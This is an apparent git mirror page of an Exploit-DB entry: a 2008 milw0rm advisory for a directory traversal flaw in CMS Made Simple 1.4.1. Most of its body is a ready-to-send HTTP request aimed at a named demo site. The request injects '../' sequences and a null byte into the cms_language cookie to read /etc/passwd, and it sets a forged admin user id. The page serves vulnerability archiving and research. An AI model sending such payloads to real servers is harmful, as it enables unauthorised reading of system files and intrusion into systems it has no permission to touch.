bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/7285.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

24 lines
No EOL
716 B
Text
Raw Blame History

Type: Directory Traversal vulnerability (Unix tested) / Root privileges escalation
Vendor: CMS Made Simple
Software: CMS Made Simple 1.4.1 "Spring Garden" (and probably others ...)
Author: M4ck-h@cK
Date 29.11.2008
Home: sweet home
contact: no, thx :)
Exploit:
Demo: on h[ttp://demo.cmsmadesimple.fr/admin/]
GET http://demo.cmsmadesimple.fr/admin/login.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: demo.cmsmadesimple.fr
Cookie: cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1
Connection: Close
Pragma: no-cache
It's possible to set "cms_language" value in order to view /etc/passwd file.
# milw0rm.com [2008-11-29]
Reference in a new issue View git blame Copy permalink